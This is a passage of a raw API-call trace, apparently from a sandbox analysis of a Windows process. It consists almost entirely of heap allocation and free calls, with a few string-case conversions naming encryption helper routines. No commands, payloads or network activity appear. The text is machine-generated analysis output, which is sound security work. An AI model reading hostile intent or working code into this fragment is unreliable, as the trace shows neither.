RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5198) returned 0x8affc0 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.245] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.246] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.246] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5198) returned 0x8affc0 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5198) returned 0x935008 [0033.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.248] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.248] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0033.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.248] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.249] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.249] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.250] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.251] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.251] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.252] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: 